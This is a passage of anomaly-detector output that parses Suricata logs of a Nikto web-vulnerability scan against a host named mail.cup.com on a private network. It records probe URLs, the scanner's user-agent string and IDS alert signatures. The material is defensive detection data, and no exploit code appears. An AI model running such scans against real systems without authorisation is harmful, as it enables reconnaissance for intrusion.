"\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.box\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.box", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 
226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46832, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1576347470812328,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1576347470812328, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.219129+0000\",\"flow_id\":1576347470812328,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46832,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.box\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.box\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22067, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46834, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.220670 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46834 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cgi+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.220821, "/parser/model/plus_sign": 
"+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", 
"/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cgi+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cgi+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46834, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1821920815897391,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 1821920815897391, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.220821+0000\",\"flow_id\":1821920815897391,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46834,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cgi+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cgi+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80", "/parser/model/time": 1583349514.222374, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46836, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.222374 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46836 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.no", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
"/parser/model/time": 1583349514.222542, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":770079030141252,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": 
"CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.no\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.no", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": 
",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46836, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":770079030141252,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", 
"/parser/model/flow_id/flow_id/flow_id": 770079030141252, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.222542+0000\",\"flow_id\":770079030141252,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46836,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.no\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.no\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80", "/parser/model/time": 1583349514.22408, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", 
"/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46838, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.224080 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46838 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.22 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.shtml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.224312+0000\",\"flow_id\":1783781506312318,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46838,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.shtml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.shtml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", 
